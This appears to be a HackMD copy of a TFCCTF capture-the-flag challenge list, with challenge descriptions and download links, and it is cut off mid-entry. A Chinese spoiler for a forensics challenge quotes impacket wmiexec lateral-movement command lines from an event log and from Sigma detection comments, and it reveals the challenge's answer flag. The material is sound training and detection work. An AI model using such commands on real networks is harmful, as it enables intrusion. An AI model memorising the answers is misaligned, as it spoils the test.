{%hackmd @guantou/wCUF8SmjTx-aqd-kwi98qA %} <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> BAD INVADERS </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> MISC </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> EASY </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Hiumee </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Just a game. Win </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/bad_invaders.zip/d/1F8p4W0lrXaftnqIbe5q_x1VRxgiN7B2x/view?usp=sharing"> <p> bad_invaders.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> BIAS FREE DEMOCRACY </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> CRYPTO </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> INSANE </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> minipif </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> In the aftermath, a few masterminds behind the operation managed to escape and have now relaunched their scheme. We've intercepted their encrypted communications, but we need your expertise to decrypt and decipher them. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/bias_free_democracy.zip/d/1fmX5vKLjchcVzusm6RLEXpRbs1r51dWO/view?usp=sharing"> <p> bias_free_democracy.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> BIASED ELECTIONS </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> CRYPTO </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> HARD </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> minipif </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> We heard rumors that someone might rig the upcoming elections. We managed to place a backdoor in one of their messaging systems. See what you can make out of it, the world counts on you. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/biased_elections.zip/d/1D84TCLhDjZwSNn7Prw8wrLz-vIkieEMu/view?usp=sharing"> <p> biased_elections.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> BRAVE TRAVELER </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> REVERSE </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> EASY </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> header </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> There's a whole world left to explore. Don't forget the flag format: TFCCTF{stringOfText} </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/travel/d/1d2rhj1B9Ns18Bne3voJSiaiORX12SL00/view?usp=sharing"> <p> travel </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> CCCCC </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> CRYPTO </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> WARMUP </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> hofill </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC CCCCC </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/ccccc.txt/d/16YED6CPKfTE0svuFuxjCHwMXraxhowHS/view?usp=sharing"> <p> ccccc.txt </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> CONWAY </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> CRYPTO </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> EASY </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> hofill </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Sequences... Sequences sequences... Sequences sequences sequences... </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/conway.zip/d/1fk0eifplCEUROV8BrnAJCS1fnWZDb9Y5/view?usp=sharing"> <p> conway.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> DISCORD SHENANIGANS V4 </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> MISC </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> EASY </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> hofill </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Ahhh... the old flag-in-the-Discord challenge. The shenanigans are back, let's hope it goes well! Go to #bot-commands! Flag format: TFCCTF{secret_message_in_the_discord} </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="None"> <p> None </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> FLASK DESTROYER </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> WEB </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> HARD </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Sagi </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Just a C fan playing in Python. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/flask-destroyer.zip/d/1FiSjfNiJ062UFQEzlwlDqDksFAKPjbz3/view?usp=sharing"> <p> flask-destroyer.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> FUNCTIONAL </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> REVERSE </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> EASY </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Hiumee </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> It functions. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/functional.zip/d/1KrLiQL9v4DLeHWMZM1xNNdmyPXb14ueR/view?usp=sharing"> <p> functional.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> FUNNY </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> WEB </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> hofill </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> This challenge is HILARIOUS! </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/funny.zip/d/1HUul6ajIoHQVgW4mbX3Bo141s2mn9FfD/view?usp=sharing"> <p> funny.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> GEM PRISON </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> MISC </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> HARD </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Hiumee </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> You got greedy and got stuck in a ruby mine. Find a way out </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/gem_prison.zip/d/1BaPBHSP0sYtLlo0_0hwq8Zerh74dAvJw/view?usp=sharing"> <p> gem_prison.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> GENETICS </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> CRYPTO </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> WARMUP </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> hofill </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> I just took a quick look at my DNA. I feel like I was created for this CTF. CCCA CACG CAAT CAAT CCCA CACG CTGT ATAC CCTT CTCT ATAC CGTA CGTA CCTT CGCT ATAT CTCA CCTT CTCA CGGA ATAC CTAT CCTT ATCA CTAT CCTT ATCA CCTT CTCA ATCA CTCA CTCA ATAA ATAA CCTT CCCG ATAT CTAG CTGC CCTT CTAT ATAA ATAA CGTG CTTC </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="None"> <p> None </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> GREETINGS </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> WEB </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> WARMUP </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> skyv3il </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Welcome to our ctf! Hope you enjoy it! Have fun </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="None"> <p> None </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> GUARD-THE-BYPASS </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> PWN </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> EASY </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Luma </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Guard this cookie. Note: If you successfully create a working exploit in the provided Docker, ensure you try the exploit multiple times on the remote system if any issues arise. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/chall.zip/d/1NYqxCDON8PFFtscQC2cD6i8-yiFWMfqw/view?usp=drive_link"> <p> chall.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> HE DID WHAT_! </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> FORENSICS </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Plig </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> After the attacker connected to our server, he managed to extract some random data, however encrypted. We trust to decrypt it and get the flag. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched" style="color:#efe6dd"> TFCCTF{wmiexec_smb_127.0.0.1_admin$} </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/Challenge.evtx/d/1WcZYiDpRB7djPxjhkoo0rKl42LqSw3Wg/view?usp=drive_link"> <p> Challenge.evtx </p></a></div> </div> </div> </body> :::spoiler 使用事件檢視器打開 需要找到用於連接的工具、它連接到的服務、其 IP 位址和共享資源資料夾 我想從共享資料夾來找  可以從詳細資料中看到 ``` SubjectUserSid S-1-5-21-4230534742-2542757381-3142984815-1111 SubjectUserName admmig SubjectDomainName OFFSEC SubjectLogonId 0x4da321f ObjectType File IpAddress 10.23.123.11 IpPort 47020 ShareName \\*\ADMIN$ ShareLocalPath \??\C:\Windows AccessMask 0x1 AccessList %%4416 ``` ip 10.23.123.11 資料夾 ADMIN$ 服務 SMB 工具 PsExec TFCCTF{psexec_smb_10.23.123.11_admin$} 錯了 後來發現時間序是下面最先，所以從下面往上看 找到最開始的檔案分享，慢慢往前看，可以找到 ``` SubjectUserSid S-1-5-20 SubjectUserName SRVDEFENDER01$ SubjectDomainName OFFSEC SubjectLogonId 0x3e4 NewProcessId 0xd44 NewProcessName C:\Windows\System32\cmd.exe TokenElevationType %%1936 ProcessId 0xac8 CommandLine cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619425227.894209 2>&1 TargetUserSid S-1-0-0 TargetUserName admmig TargetDomainName OFFSEC TargetLogonId 0x4da32af ParentProcessName C:\Windows\System32\wbem\WmiPrvSE.exe MandatoryLabel S-1-16-12288 ``` TFCCTF{cmd_wmiexec_10.23.123.11_admin\$} 一直嘗試不同的值 但是都錯誤 基本上可以確定smb和admin\$兩個是正確的 開始亂猜 找到這個網站 https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_hktl_impacket_lateral_movement/ ``` # *** wmiexec.py # parent is wmiprvse.exe # examples: # cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1 # cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1567439113.54 2>&1 ``` `TFCCTF{wmiexec_smb_127.0.0.1_admin\$}` 應該 沒記得最後答案 https://wenku.csdn.net/answer/4m7p6bxn7x ::: <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> HELLFIRE PHANTOM </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> CRYPTO </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> EASY </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> minipif </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> In the heart of an ancient, cursed forest lies the Phantom's lair, shrouded in hellfire. Legends speak of a powerful artifact hidden within, guarded by spectral flames and arcane riddles. Will you be the one to break the curse and uncover the secrets of the Hellfire Phantom? <br><br> Note: Challenge requires a bit of bruteforcing. Solver takes ~10 mins to run on my laptop. Note: sha256sum of the variable secret's value is f8f099dd278c23d44387914def5fc20bc0fb8915d916775e5b4b17275e2107bd, website used is https://emn178.github.io/online-tools/sha256.html, input encoding UTF-8 Note: A person had issue with receiving multiple G points. The one that is used in the challenge ends in 727. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/hellfire_phantom.zip/d/17eZ-_cEHotLZBndEHv9Rpn1J7sW6iG4h/view?usp=sharing"> <p> hellfire_phantom.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> LICENSE </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> REVERSE </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> WARMUP </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Luma </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> I need to access this tool. Please help me with a license key! </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/license/d/1hS_qgf2WZdb_bsok_d35hRspGw_i_Blc/view?usp=drive_link"> <p> license </p></a></div> </div> </div> </body> :::spoiler ltrace ./license可以看到使用的函式 把decomplier的名稱重新命名 ::: <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> LUMAPCI </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> PWN </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> HARD </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Livian </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Luma failed maths so I made him a PCI card that will help him do some calculations. Don't think you can exploit it because it only runs my signed firmware :3. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/lumapci.zip/d/1UUZhXuXRByLNE0gaYLPCgA9Kt9DGiDEo/view?usp=sharing"> <p> lumapci.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> MCBACK2DABASICS </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> PWN </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Mcsky23 </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Back 2 the chunks back 2 the muney back 2 the writes I don't listen 2 u when u corrupted cause u just talkin out of bytes You'll clear some certain bins just to see us overwrite... </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/mcback2dabasics.tar.gz/d/1yo_T6AE-5t8e_IKTur3n-Iq8aOLuu14w/view?usp=share_link"> <p> mcback2dabasics.tar.gz </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> MCBSH </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> MISC </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Mcsky23 </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> I have managed to maintain backdoor access to their server, but the police is lurking around. How can I evade their detection? </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="None"> <p> None </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> MCGUAVA </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> PWN </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> INSANE </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Mcsky23 </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> I don't really like giving you print functions... but I can give you some guava juice... or some buava buice? Your choice! </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/mcguava.tar.gz/d/12BdmxTeEhpOKK908evTRxmhnSwwLVfbo/view?usp=share_link"> <p> mcguava.tar.gz </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> MCKNIGHT </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> REVERSE </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Mcsky23 </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Knights wear armour, but does it protect them from dragons? Flag format: TFCCTF{sha256(password)} </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/mcknight.tar.gz/d/1Enh_lfoJfsbF_TM4ZZZji_XhBU-r1TRY/view?usp=share_link"> <p> mcknight.tar.gz </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> MCTABLETRAP </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> PWN </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> HARD </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> Mcsky23 </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> 100% super secure gaming without spyware or bugz! also idk who has applz?? </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/mctabletrap.tar.gz/d/1G3Ml2dpjnc2jQyvo52LMXJM0lNV9Ky1H/view?usp=share_link"> <p> mctabletrap.tar.gz </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> PADGROUNDS </h1> </div> <div class="flex items-center gap-2"> <p class="text-xl" style="color: rgb(218, 3, 119)"> CRYPTO </p> <p class="text-xl font-bold" style="color: rgb(186, 141, 7)">|</p> <p class="text- text-xl" style="color: rgb(186, 141, 7)"> MEDIUM </p> </div> </div> <div class="-mt-4 flex w-full gap-2"> <p class="text-gray-500"> minipif </p> </div> <div class="mb-4 w-full"> <p class="text-lg"> Welcome to Padgrounds, where every bit counts. Dive into the action and let your skills shine as you unravel the coded enigma. Note: Make sure your solver works locally before running on remote. </p> </div> <p class="ifield-tfc w-full ng-pristine ng-valid ng-touched"> flag </p> <div class="flex"><a target="_blank" class="flex w-full cursor-pointer gap-2" href="https://drive.google.com/padgrounds.zip/d/1mIA9eCyL24l3NpnmGdCNv9jZ1kXZO2I8/view?usp=sharing"> <p> padgrounds.zip </p></a></div> </div> </div> </body> <body> <div class="flex w-full flex-col gap-8 self-baseline p-6 text-blue-800" style="color: rgb(35, 35, 35)"> <div class="flex w-full max-w-3xl flex-col gap-4 rounded-lg bg-white p-4 shadow-lg"> <div class="flex w-full items-center justify-between"> <div class="flex items-center gap-2"> <h1 class="text-3xl font-bold"> PHISHER </h1> </div> <div class="flex items-center gap-2"> 